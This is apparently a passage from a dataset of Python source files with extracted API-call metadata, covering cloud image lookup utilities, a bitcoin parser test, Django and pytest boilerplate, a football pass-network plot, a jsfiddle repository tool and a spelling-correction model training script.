KNeighborsClassifier\n'), ((150, 24, 150, 48), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\n'), ((164, 24, 164, 43), 'xgboost.XGBClassifier', 'xgb.XGBClassifier', ({}, {}), '()', True, 'import xgboost as xgb\n'), ((203, 25, 203, 53), 'sklearn.ensemble.GradientBoostingClassifier', 'GradientBoostingClassifier', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\n'), ((238, 30, 238, 46), 'sklearn.dummy.DummyRegressor', 'DummyRegressor', ({}, {}), '()', False, 'from sklearn.dummy import DummyRegressor\n'), ((240, 30, 240, 50), 'sklearn.linear_model.Lasso', 'linear_model.Lasso', ({}, {}), '()', False, 'from sklearn import linear_model\n'), ((243, 27, 243, 50), 'sklearn.ensemble.RandomForestRegressor', 'RandomForestRegressor', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\n'), ((248, 28, 248, 55), 'sklearn.ensemble.GradientBoostingRegressor', 'GradientBoostingRegressor', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\n'), ((254, 26, 254, 43), 'sklearn.dummy.DummyClassifier', 'DummyClassifier', ({}, {}), '()', False, 'from sklearn.dummy import DummyClassifier\n'), ((259, 26, 259, 46), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ({}, {}), '()', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((268, 26, 268, 33), 'sklearn.linear_model.Lasso', 'Lasso', ({}, {}), '()', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((272, 26, 272, 76), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', (), '', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((277, 26, 277, 85), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', (), '', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((280, 23, 280, 47), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ({}, {}), '()', False, 'from sklearn.tree import DecisionTreeClassifier\n'), ((288, 24, 288, 29), 'sklearn.svm.SVC', 'SVC', ({}, {}), '()', False, 'from sklearn.svm import SVC\n'), ((291, 24, 291, 46), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ({}, {}), '()', False, 'from sklearn.neighbors import KNeighborsClassifier\n'), ((323, 23, 323, 47), 'sklearn.ensemble.RandomForestClassifier', 'RandomForestClassifier', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\n'), ((387, 24, 387, 52), 'sklearn.ensemble.GradientBoostingClassifier', 'GradientBoostingClassifier', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\n'), ((69, 36, 69, 61), 'numpy.arange', 'np.arange', ({(69, 46, 69, 49): '(0.1)', (69, 51, 69, 54): '(1.0)', (69, 56, 69, 60): '(0.01)'}, {}), '(0.1, 1.0, 0.01)', True, 'import numpy as np\n'), ((241, 36, 241, 61), 'numpy.arange', 'np.arange', ({(241, 46, 241, 49): '(0.1)', (241, 51, 241, 54): '(1.0)', (241, 56, 241, 60): '(0.01)'}, {}), '(0.1, 1.0, 0.01)', True, 'import numpy as np\n'), ((415, 28, 420, 83), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n')] |
hwoarang/caasp-container-manifests | cloud/caasp-admin-setup/lib/caaspadminsetup/utils.py | 6df831d6b4f4218f96e552c416d86eabcfad46c0 | import json
import logging
import re
import susepubliccloudinfoclient.infoserverrequests as ifsrequest
import yaml
import sys
RELEASE_DATE = re.compile('^.*-v(\d{8})-*.*')
def get_caasp_release_version():
"""Return the version from os-release"""
os_release = open('/etc/os-release', 'r').readlines()
for entry in os_release:
if entry.startswith('VERSION_ID'):
version_id = entry.split('=')[-1].strip()
# We assume that os-release will always have '"' as
# version delimiters
version = version_id.strip('"\'')
logging.info('Release version: "%s"' % version)
return version
def get_cloud_config_path():
"""Return the path for the cloud configuration file"""
return '/etc/salt/pillar/cloud.sls'
def get_from_config(config_option):
"""Get the value for the given config option"""
# Expected low usage of this method, re-read the file on an as needed
# basis. If this turns out to be an issue cache the content
config_path = get_cloud_config_path()
with open(config_path) as config_file:
config = yaml.load(config_file.read())
settings = config.get('cloud')
if not settings:
return
return settings.get(config_option)
def get_cluster_image_identifier(framework, region):
"""Return the identifier for the latest cluster node image"""
cluster_image = get_from_config('cluster_image')
if cluster_image:
# The data returned in this code path has built in knowledge
# about the information consumed by the client from the
# full pint data
image_data = {}
image_data['id'] = cluster_image
image_data['name'] = cluster_image
if framework == 'microsoft' and cluster_image.count(':') == 3:
image_data['urn'] = cluster_image
msg = 'Using cluster image from configuration. '
msg += 'Image data for cluster node image: "%s"'
logging.info(msg % image_data)
return image_data
name_filter = 'name~caasp,name~cluster'
flavor = get_from_config('procurement_flavor')
if flavor == 'byos':
name_filter += ',name~byos'
else:
name_filter += ',name!byos'
version = get_caasp_release_version()
name_filter += ',name~' + version.replace('.', '-')
# The cluster image we choose depends on the admin node version,
# thus we cannot just query for active images. We need to get all
# images and then process accordingly.
try:
image_info = ifsrequest.get_image_data(
framework,
None,
'json',
region,
name_filter
)
except Exception as e:
logging.error('Pint server access failed: "%s"' % e.message)
# This message will bubble up through salt
return 'See /var/log/caasp_cloud_setup.log'
try:
image_data = json.loads(image_info)
available_images = image_data.get('images', [])
target_image = None
target_image_date = 0
for image in available_images:
image_name = image.get('name')
try:
date = int(RELEASE_DATE.match(image_name).group(1))
if date > target_image_date:
# If we have multiple images with the same date that
# match our filter criteria we have a serious data problem
# we cannot really recover, the first one wins
target_image = image
except Exception:
# Image name with no date stamp skip it
continue
except Exception as e:
logging.error('Could not load json data from pint: "%s"' % e.message)
# This message will bubble up through salt
return 'See /var/log/caasp_cloud_setup.log'
if not target_image:
logging.error('Could not determine image identifier for cluster node.')
logging.error('This implies that the pint server is unreachable or the '
'data is incomplete, please report the issue, exiting.')
sys.exit('pint lookup failed')
logging.info('Image data for cluster node image: "%s"' % target_image)
return target_image
def load_platform_module(platform_name):
mod = __import__('caaspadminsetup.%s' % platform_name, fromlist=[''])
return mod
| [((8, 15, 8, 45), 're.compile', 're.compile', ({(8, 26, 8, 44): '"""^.*-v(\\\\d{8})-*.*"""'}, {}), "('^.*-v(\\\\d{8})-*.*')", False, 'import re\n'), ((109, 4, 109, 74), 'logging.info', 'logging.info', ({(109, 17, 109, 73): '(\'Image data for cluster node image: "%s"\' % target_image)'}, {}), '(\'Image data for cluster node image: "%s"\' % target_image)', False, 'import logging\n'), ((56, 8, 56, 38), 'logging.info', 'logging.info', ({(56, 21, 56, 37): '(msg % image_data)'}, {}), '(msg % image_data)', False, 'import logging\n'), ((70, 21, 76, 9), 'susepubliccloudinfoclient.infoserverrequests.get_image_data', 'ifsrequest.get_image_data', ({(71, 12, 71, 21): 'framework', (72, 12, 72, 16): 'None', (73, 12, 73, 18): '"""json"""', (74, 12, 74, 18): 'region', (75, 12, 75, 23): 'name_filter'}, {}), "(framework, None, 'json', region, name_filter)", True, 'import susepubliccloudinfoclient.infoserverrequests as ifsrequest\n'), ((82, 21, 82, 43), 'json.loads', 'json.loads', ({(82, 32, 82, 42): 'image_info'}, {}), '(image_info)', False, 'import json\n'), ((104, 8, 104, 79), 'logging.error', 'logging.error', ({(104, 22, 104, 78): '"""Could not determine image identifier for cluster node."""'}, {}), "('Could not determine image identifier for cluster node.')", False, 'import logging\n'), ((105, 8, 106, 78), 'logging.error', 'logging.error', ({(105, 22, 106, 77): '"""This implies that the pint server is unreachable or the data is incomplete, please report the issue, exiting."""'}, {}), "(\n 'This implies that the pint server is unreachable or the data is incomplete, please report the issue, exiting.'\n )", False, 'import logging\n'), ((107, 8, 107, 38), 'sys.exit', 'sys.exit', ({(107, 17, 107, 37): '"""pint lookup failed"""'}, {}), "('pint lookup failed')", False, 'import sys\n'), ((20, 12, 20, 59), 'logging.info', 'logging.info', ({(20, 25, 20, 58): '(\'Release version: "%s"\' % version)'}, {}), '(\'Release version: "%s"\' % version)', False, 'import logging\n'), ((78, 8, 78, 68), 'logging.error', 'logging.error', ({(78, 22, 78, 67): '(\'Pint server access failed: "%s"\' % e.message)'}, {}), '(\'Pint server access failed: "%s"\' % e.message)', False, 'import logging\n'), ((99, 8, 99, 77), 'logging.error', 'logging.error', ({(99, 22, 99, 76): '(\'Could not load json data from pint: "%s"\' % e.message)'}, {}), '(\'Could not load json data from pint: "%s"\' % e.message)', False, 'import logging\n')] |
simewu/bitcoin_researcher | tools/Bitcoin Parser/blockchain_parser/tests/test_block.py | b9fd2efdb8ae8467c5bd4b3320713a541635df16 | # Copyright (C) 2015-2016 The bitcoin-blockchain-parser developers
#
# This file is part of bitcoin-blockchain-parser.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of bitcoin-blockchain-parser, including this file, may be copied,
# modified, propagated, or distributed except according to the terms contained
# in the LICENSE file.
import unittest
from datetime import datetime
from .utils import read_test_data
from blockchain_parser.block import Block
class TestBlock(unittest.TestCase):
def test_from_hex(self):
block_hex = read_test_data("genesis_block.txt")
block = Block.from_hex(block_hex)
self.assertEqual(1, block.n_transactions)
block_hash = "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1" \
"b60a8ce26f"
self.assertEqual(block_hash, block.hash)
self.assertEqual(486604799, block.header.bits)
merkle_root = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
"b7afdeda33b"
self.assertEqual(merkle_root, block.header.merkle_root)
self.assertEqual(2083236893, block.header.nonce)
self.assertEqual(1, block.header.version)
self.assertEqual(1, block.header.difficulty)
self.assertEqual(285, block.size)
self.assertEqual(datetime.utcfromtimestamp(1231006505),
block.header.timestamp)
self.assertEqual("0" * 64, block.header.previous_block_hash)
for tx in block.transactions:
self.assertEqual(1, tx.version)
tx_hash = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \
"b7afdeda33b"
self.assertEqual(tx_hash, tx.hash)
self.assertEqual(204, tx.size)
self.assertEqual(0, tx.locktime)
self.assertEqual(0xffffffff, tx.inputs[0].transaction_index)
self.assertEqual(0xffffffff, tx.inputs[0].sequence_number)
self.assertTrue("ffff001d" in tx.inputs[0].script.value)
self.assertEqual("0" * 64, tx.inputs[0].transaction_hash)
self.assertEqual(50 * 100000000, tx.outputs[0].value)
| [((22, 16, 22, 41), 'blockchain_parser.block.Block.from_hex', 'Block.from_hex', ({(22, 31, 22, 40): 'block_hex'}, {}), '(block_hex)', False, 'from blockchain_parser.block import Block\n'), ((35, 25, 35, 62), 'datetime.datetime.utcfromtimestamp', 'datetime.utcfromtimestamp', ({(35, 51, 35, 61): '(1231006505)'}, {}), '(1231006505)', False, 'from datetime import datetime\n')] |
genegeniebio/genegenie-admin | genegenie/admin/__init__.py | 93e9253febc14b17d17a5fbc2eb0e22f1c974083 | '''
DNA++ (c) DNA++ 2017
All rights reserved.
@author: neilswainston
'''
| [] |
pkavousi/similar-users | tests/conftest.py | 8434e0a03dc8dfa218a34601431c564dff3e80b6 | import os
import pandas as pd
import pytest
from user_similarity_model.config.core import DATASET_DIR, config
@pytest.fixture()
def sample_local_data():
"""AI is creating summary for sample_local_data
Returns:
[Dict]: This function returns a dictionary with CSV files which
in dataset folder. The data will be compared in tests against data
that are pulled from Azure PostgreSQL server.
"""
sample_data = {}
for file in config.app_config.csv_files:
sample_data[file[0:-4]] = pd.read_csv(os.path.join(DATASET_DIR, file))
return sample_data
| [((9, 1, 9, 17), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((20, 46, 20, 77), 'os.path.join', 'os.path.join', ({(20, 59, 20, 70): 'DATASET_DIR', (20, 72, 20, 76): 'file'}, {}), '(DATASET_DIR, file)', False, 'import os\n')] |
chrisjen83/rfb_weather_obs | weather/apps.py | 8eab16358c5059655d208ef41aa38692fa21776f | from django.apps import AppConfig
import logging
logger = logging.getLogger(__name__)
class WeatherConfig(AppConfig):
name = 'weather'
def ready(self):
from forecastUpdater import updater
updater.start()
| [((4, 9, 4, 36), 'logging.getLogger', 'logging.getLogger', ({(4, 27, 4, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((12, 8, 12, 23), 'forecastUpdater.updater.start', 'updater.start', ({}, {}), '()', False, 'from forecastUpdater import updater\n')] |
fleimgruber/python | projects/django-filer/test.py | 2e735762c73651cffc027ca850b2a58d87d54b49 | import filer
import tests
| [] |
DymondFormation/mplsoccer | examples/plots/plot_pass_network.py | 544300857ec5936781e12fda203cf2df8a3d00b9 | """
============
Pass Network
============
This example shows how to plot passes between players in a set formation.
"""
import pandas as pd
from mplsoccer.pitch import Pitch
from matplotlib.colors import to_rgba
import numpy as np
from mplsoccer.statsbomb import read_event, EVENT_SLUG
##############################################################################
# Set team and match info, and get event and tactics dataframes for the defined match_id
match_id = 15946
team = 'Barcelona'
opponent = 'Alavés (A), 2018/19 La Liga'
event_dict = read_event(f'{EVENT_SLUG}/{match_id}.json', warn=False)
players = event_dict['tactics_lineup']
events = event_dict['event']
##############################################################################
# Adding on the last tactics id and formation for the team for each event
events.loc[events.tactics_formation.notnull(), 'tactics_id'] = events.loc[
events.tactics_formation.notnull(), 'id']
events[['tactics_id', 'tactics_formation']] = events.groupby('team_name')[[
'tactics_id', 'tactics_formation']].ffill()
##############################################################################
# Add the abbreviated player position to the players dataframe
formation_dict = {1: 'GK', 2: 'RB', 3: 'RCB', 4: 'CB', 5: 'LCB', 6: 'LB', 7: 'RWB',
8: 'LWB', 9: 'RDM', 10: 'CDM', 11: 'LDM', 12: 'RM', 13: 'RCM',
14: 'CM', 15: 'LCM', 16: 'LM', 17: 'RW', 18: 'RAM', 19: 'CAM',
20: 'LAM', 21: 'LW', 22: 'RCF', 23: 'ST', 24: 'LCF', 25: 'SS'}
players['position_abbreviation'] = players.player_position_id.map(formation_dict)
##############################################################################
# Add on the subsitutions to the players dataframe, i.e. where players are subbed on
# but the formation doesn't change
sub = events.loc[events.type_name == 'Substitution',
['tactics_id', 'player_id', 'substitution_replacement_id',
'substitution_replacement_name']]
players_sub = players.merge(sub.rename({'tactics_id': 'id'}, axis='columns'),
on=['id', 'player_id'], how='inner', validate='1:1')
players_sub = (players_sub[['id', 'substitution_replacement_id', 'position_abbreviation']]
.rename({'substitution_replacement_id': 'player_id'}, axis='columns'))
players = pd.concat([players, players_sub])
players.rename({'id': 'tactics_id'}, axis='columns', inplace=True)
players = players[['tactics_id', 'player_id', 'position_abbreviation']]
##############################################################################
# Add player position information to the events dataframe
# add on the position the player was playing in the formation to the events dataframe
events = events.merge(players, on=['tactics_id', 'player_id'], how='left', validate='m:1')
# add on the position the receipient was playing in the formation to the events dataframe
events = events.merge(players.rename({'player_id': 'pass_recipient_id'},
axis='columns'), on=['tactics_id', 'pass_recipient_id'],
how='left', validate='m:1', suffixes=['', '_receipt'])
##############################################################################
# Create dataframes for passes and player locations
# get a dataframe with all passes
mask_pass = (events.team_name == team) & (events.type_name == 'Pass')
to_keep = ['id', 'match_id', 'player_id', 'player_name', 'outcome_name', 'pass_recipient_id',
'pass_recipient_name', 'x', 'y', 'end_x', 'end_y', 'tactics_id', 'tactics_formation',
'position_abbreviation', 'position_abbreviation_receipt']
passes = events.loc[mask_pass, to_keep].copy()
print('Formations used by {} in match: '.format(team), passes['tactics_formation'].unique())
##############################################################################
# Filter passes by chosen formation, then group all passes and receipts to
# calculate avg x, avg y, count of events for each slot in the formation
formation = 433
passes_formation = passes[(passes.tactics_formation == formation) &
(passes.position_abbreviation_receipt.notnull())].copy()
passer_passes = passes_formation[['position_abbreviation', 'x', 'y']].copy()
recipient_passes = passes_formation[['position_abbreviation_receipt', 'end_x', 'end_y']].copy()
# rename columns to match those in passer_passes
recipient_passes.rename({'position_abbreviation_receipt': 'position_abbreviation',
'end_x': 'x', 'end_y': 'y'}, axis='columns', inplace=True)
# create a new dataframe containing all individual passes and receipts from passes_formation
appended_passes = pd.concat(objs=[passer_passes, recipient_passes], ignore_index=True)
average_locs_and_count = appended_passes.groupby('position_abbreviation').agg({
'x': ['mean'], 'y': ['mean', 'count']})
average_locs_and_count.columns = ['x', 'y', 'count']
##############################################################################
# Group the passes by unique pairings of players and add the avg player positions to this dataframe
# calculate the number of passes between each position (using min/ max so we get passes both ways)
passes_formation['pos_max'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].max(axis='columns')
passes_formation['pos_min'] = passes_formation[['position_abbreviation',
'position_abbreviation_receipt']].min(axis='columns')
passes_between = passes_formation.groupby(['pos_min', 'pos_max']).id.count().reset_index()
passes_between.rename({'id': 'pass_count'}, axis='columns', inplace=True)
# add on the location of each player so we have the start and end positions of the lines
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_min', right_index=True)
passes_between = passes_between.merge(average_locs_and_count, left_on='pos_max', right_index=True,
suffixes=['', '_end'])
##############################################################################
# Calculate the line width and marker sizes relative to the largest counts
max_line_width = 18
max_marker_size = 3000
passes_between['width'] = passes_between.pass_count / passes_between.pass_count.max() * max_line_width
average_locs_and_count['marker_size'] = (average_locs_and_count['count']
/ average_locs_and_count['count'].max() * max_marker_size)
##############################################################################
# Set color to make the lines more transparent when fewer passes are made
min_transparency = 0.3
color = np.array(to_rgba('white'))
color = np.tile(color, (len(passes_between), 1))
c_transparency = passes_between.pass_count / passes_between.pass_count.max()
c_transparency = (c_transparency * (1 - min_transparency)) + min_transparency
color[:, 3] = c_transparency
##############################################################################
# Plotting
pitch = Pitch(pitch_type='statsbomb', orientation='horizontal',
pitch_color='#22312b', line_color='#c7d5cc', figsize=(16, 11),
constrained_layout=True, tight_layout=False)
fig, ax = pitch.draw()
pass_lines = pitch.lines(passes_between.x, passes_between.y,
passes_between.x_end, passes_between.y_end, lw=passes_between.width,
color=color, zorder=1, ax=ax)
pass_nodes = pitch.scatter(average_locs_and_count.x, average_locs_and_count.y, s=average_locs_and_count.marker_size,
color='red', edgecolors='black', linewidth=1, alpha=1, ax=ax)
for index, row in average_locs_and_count.iterrows():
pitch.annotate(row.name, xy=(row.x, row.y), c='white', va='center', ha='center', size=16, weight='bold', ax=ax)
title = ax.set_title("{} {} Formation vs {}".format(team, formation, opponent), size=28, y=0.97, color='#c7d5cc')
fig.set_facecolor("#22312b")
| [((21, 13, 21, 68), 'mplsoccer.statsbomb.read_event', 'read_event', (), '', False, 'from mplsoccer.statsbomb import read_event, EVENT_SLUG\n'), ((53, 10, 53, 43), 'pandas.concat', 'pd.concat', ({(53, 20, 53, 42): '[players, players_sub]'}, {}), '([players, players_sub])', True, 'import pandas as pd\n'), ((91, 18, 91, 86), 'pandas.concat', 'pd.concat', (), '', True, 'import pandas as pd\n'), ((133, 8, 135, 58), 'mplsoccer.pitch.Pitch', 'Pitch', (), '', False, 'from mplsoccer.pitch import Pitch\n'), ((124, 17, 124, 33), 'matplotlib.colors.to_rgba', 'to_rgba', ({(124, 25, 124, 32): '"""white"""'}, {}), "('white')", False, 'from matplotlib.colors import to_rgba\n')] |
andrewp-as-is/jsfiddle-factory.py | jsfiddle_factory/__init__.py | 7b8b883676f3330f5714b15157819b583a753ba1 | __all__ = ['Factory']
import jsfiddle_build
import jsfiddle_github
import jsfiddle_generator
import jsfiddle_readme_generator
import getdirs
import getfiles
import os
import popd
import yaml
@popd.popd
def _build(path):
os.chdir(path)
jsfiddle_build.Build().save("build.html")
@popd.popd
def _init(path):
os.chdir(path)
isempty = len(os.listdir(path)) == 0
isfiddle = len(
list(filter(os.path.exists, ["demo.css", "demo.js", "demo.html"]))) > 0
if isempty or isfiddle:
jsfiddle_generator.JSFiddleRepo().create()
@popd.popd
def _readme(path):
os.chdir(path)
jsfiddle_readme_generator.Readme().save("README.md")
class Factory:
"""attrs: `path`. methods: `detox()`, `init()`, `build()`, `readme()`, `update_resources()`"""
path = None
def __init__(self, path=None):
if not path:
path = os.getcwd()
self.path = path
def build_html(self):
files = getfiles.getfiles(self.path)
matches = ["demo.html", "fiddle.html"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
_build(os.path.dirname(f))
def create_readme(self):
files = getfiles.getfiles(self.path)
matches = ["demo.html", "fiddle.html"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
_readme(os.path.dirname(f))
def init(self):
for path in getdirs.getdirs(self.path):
_init(path)
def detox(self):
renamed = True
while renamed:
renamed = False
for path in getdirs.getdirs(self.path):
relpath = os.path.relpath(path, os.getcwd())
new_relpath = jsfiddle_github.sanitize(relpath)
new_path = os.path.join(os.getcwd(), new_relpath)
ishidden = relpath[0] == "." and "%s." % os.sep not in relpath
if not ishidden and new_relpath != relpath:
os.rename(path, new_path)
print("%s -> %s" % (path, new_path))
renamed = True
break
def update_resources(self):
f = os.path.join(self.path, "resources.txt")
if not os.path.exists(f):
print("SKIP: %s NOT EXISTS" % f)
resources = list(filter(None, open(f).read().splitlines()))
files = getfiles.getfiles(self.path)
matches = ["demo.details", "fiddle.manifest"]
for f in filter(lambda f: os.path.basename(f) in matches, files):
if os.path.exists(f):
data = yaml.load(open(f, 'r'))
if data.get("resources", []) != resources:
data["resources"] = resources
yaml.dump(data, open(f, 'w'), default_flow_style=False)
| [((17, 4, 17, 18), 'os.chdir', 'os.chdir', ({(17, 13, 17, 17): 'path'}, {}), '(path)', False, 'import os\n'), ((23, 4, 23, 18), 'os.chdir', 'os.chdir', ({(23, 13, 23, 17): 'path'}, {}), '(path)', False, 'import os\n'), ((33, 4, 33, 18), 'os.chdir', 'os.chdir', ({(33, 13, 33, 17): 'path'}, {}), '(path)', False, 'import os\n'), ((47, 16, 47, 44), 'getfiles.getfiles', 'getfiles.getfiles', ({(47, 34, 47, 43): 'self.path'}, {}), '(self.path)', False, 'import getfiles\n'), ((53, 16, 53, 44), 'getfiles.getfiles', 'getfiles.getfiles', ({(53, 34, 53, 43): 'self.path'}, {}), '(self.path)', False, 'import getfiles\n'), ((59, 20, 59, 46), 'getdirs.getdirs', 'getdirs.getdirs', ({(59, 36, 59, 45): 'self.path'}, {}), '(self.path)', False, 'import getdirs\n'), ((78, 12, 78, 52), 'os.path.join', 'os.path.join', ({(78, 25, 78, 34): 'self.path', (78, 36, 78, 51): '"""resources.txt"""'}, {}), "(self.path, 'resources.txt')", False, 'import os\n'), ((82, 16, 82, 44), 'getfiles.getfiles', 'getfiles.getfiles', ({(82, 34, 82, 43): 'self.path'}, {}), '(self.path)', False, 'import getfiles\n'), ((18, 4, 18, 26), 'jsfiddle_build.Build', 'jsfiddle_build.Build', ({}, {}), '()', False, 'import jsfiddle_build\n'), ((24, 18, 24, 34), 'os.listdir', 'os.listdir', ({(24, 29, 24, 33): 'path'}, {}), '(path)', False, 'import os\n'), ((34, 4, 34, 38), 'jsfiddle_readme_generator.Readme', 'jsfiddle_readme_generator.Readme', ({}, {}), '()', False, 'import jsfiddle_readme_generator\n'), ((43, 19, 43, 30), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((66, 24, 66, 50), 'getdirs.getdirs', 'getdirs.getdirs', ({(66, 40, 66, 49): 'self.path'}, {}), '(self.path)', False, 'import getdirs\n'), ((79, 15, 79, 32), 'os.path.exists', 'os.path.exists', ({(79, 30, 79, 31): 'f'}, {}), '(f)', False, 'import os\n'), ((85, 15, 85, 32), 'os.path.exists', 'os.path.exists', ({(85, 30, 85, 31): 'f'}, {}), '(f)', False, 'import os\n'), ((28, 8, 28, 41), 'jsfiddle_generator.JSFiddleRepo', 'jsfiddle_generator.JSFiddleRepo', ({}, {}), '()', False, 'import jsfiddle_generator\n'), ((50, 19, 50, 37), 'os.path.dirname', 'os.path.dirname', ({(50, 35, 50, 36): 'f'}, {}), '(f)', False, 'import os\n'), ((56, 20, 56, 38), 'os.path.dirname', 'os.path.dirname', ({(56, 36, 56, 37): 'f'}, {}), '(f)', False, 'import os\n'), ((68, 30, 68, 63), 'jsfiddle_github.sanitize', 'jsfiddle_github.sanitize', ({(68, 55, 68, 62): 'relpath'}, {}), '(relpath)', False, 'import jsfiddle_github\n'), ((49, 34, 49, 53), 'os.path.basename', 'os.path.basename', ({(49, 51, 49, 52): 'f'}, {}), '(f)', False, 'import os\n'), ((55, 34, 55, 53), 'os.path.basename', 'os.path.basename', ({(55, 51, 55, 52): 'f'}, {}), '(f)', False, 'import os\n'), ((67, 48, 67, 59), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((69, 40, 69, 51), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((72, 20, 72, 45), 'os.rename', 'os.rename', ({(72, 30, 72, 34): 'path', (72, 36, 72, 44): 'new_path'}, {}), '(path, new_path)', False, 'import os\n'), ((84, 34, 84, 53), 'os.path.basename', 'os.path.basename', ({(84, 51, 84, 52): 'f'}, {}), '(f)', False, 'import os\n')] |
MartinXPN/SpellNN | spellnn/train.py | e3226fbff359ef60360e63bf7b80a7e1c909e7d8 | import logging
import os
from datetime import datetime
from inspect import signature, Parameter
from pathlib import Path
from pprint import pprint
from textwrap import dedent
from typing import Optional, Union
import fire
import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN
from tensorflow.keras import Model
from spellnn import models
from spellnn.data import alphabet
from spellnn.data.alphabet import get_chars
from spellnn.data.processing import DataProcessor
from spellnn.data.util import nb_lines
from spellnn.layers.mapping import CharMapping
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # FATAL
logging.getLogger('tensorflow').setLevel(logging.FATAL)
class Gym:
def __init__(self):
self.train_dataset: Optional[tf.data.Dataset] = None
self.valid_dataset: Optional[tf.data.Dataset] = None
self.char2int: Optional[CharMapping] = None
self.model: Optional[Model] = None
self.nb_train_samples: int = 0
self.nb_valid_samples: int = 0
self.batch_size = 0
def construct_dataset(self, path: str, locale: str, batch_size: int = 32, validation_split: float = 0.3):
pprint(locals())
all_chars = [alphabet.START, alphabet.END] + get_chars(locale)
char_weights = [0.5 if c.isalpha() and c.islower() else
0.2 if c.isalpha() else
0.1 if c not in {alphabet.START, alphabet.END} else
0 for c in all_chars]
self.char2int = CharMapping(chars=all_chars, include_unknown=True)
data_processor = DataProcessor(locale=locale, char2id=self.char2int,
alphabet=all_chars, alphabet_weighs=char_weights)
print('Calculating number of lines in the file...', end=' ')
all_samples = nb_lines(path)
print(all_samples)
self.batch_size = batch_size
self.nb_train_samples = int((1 - validation_split) * all_samples)
self.nb_valid_samples = all_samples - self.nb_train_samples
dataset = tf.data.TextLineDataset(path)
self.train_dataset = dataset.take(self.nb_train_samples)
self.train_dataset = self.train_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
self.train_dataset = self.train_dataset.batch(batch_size, drop_remainder=True)
self.train_dataset = self.train_dataset.map(
lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32']))
self.train_dataset = self.train_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
self.train_dataset = self.train_dataset.repeat()
self.valid_dataset = dataset.skip(self.nb_train_samples)
self.valid_dataset = self.valid_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True)
self.valid_dataset = self.valid_dataset.batch(batch_size, drop_remainder=True)
self.valid_dataset = self.valid_dataset.map(
lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32']))
self.valid_dataset = self.valid_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ))
self.valid_dataset = self.valid_dataset.repeat()
return self
def create_model(self, name):
arguments = signature(getattr(models, name).__init__)
arguments = {k: v.default for k, v in arguments.parameters.items()
if v.default is not Parameter.empty and k != 'self'}
arguments['nb_symbols'] = len(self.char2int)
arg_str = ', '.join([f'{k}=' + str(v) if type(v) != str else f'{k}=' '"' + str(v) + '"'
for k, v in arguments.items()])
# print(arg_str)
exec(dedent(f'''
def create({arg_str}):
self.model = {name}(**locals())
return self
create.__name__ = {name}.__name__
create.__doc__ = {name}.__init__.__doc__
setattr(self, create.__name__, create)
'''), {'self': self, name: getattr(models, name), arg_str: arg_str})
return getattr(self, name)
def train(self, epochs: int, monitor_metric='val_acc', patience: int = 5,
steps_per_epoch: Union[int, str] = 'auto', validation_steps: Union[int, str] = 'auto',
log_dir: str = 'logs',
use_multiprocessing: bool = False):
pprint(locals())
log_dir = Path(log_dir).joinpath(datetime.now().replace(microsecond=0).isoformat())
model_path = Path(log_dir).joinpath('checkpoints').joinpath('best-model.h5py')
model_path = str(model_path)
if steps_per_epoch == 'auto':
steps_per_epoch = self.nb_train_samples // self.batch_size
if validation_steps == 'auto':
validation_steps = self.nb_valid_samples // self.batch_size
self.model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc'])
history = self.model.fit_generator(
self.train_dataset.as_numpy_iterator(), steps_per_epoch=steps_per_epoch,
validation_data=self.valid_dataset.as_numpy_iterator(), validation_steps=validation_steps,
epochs=epochs,
use_multiprocessing=use_multiprocessing, workers=os.cpu_count() - 1,
callbacks=[
TerminateOnNaN(),
TensorBoard(log_dir=log_dir),
ModelCheckpoint(model_path, monitor=monitor_metric, verbose=1, save_best_only=True),
EarlyStopping(monitor=monitor_metric, patience=patience),
])
return history.history
if __name__ == '__main__':
cli = Gym()
fire.Fire(cli)
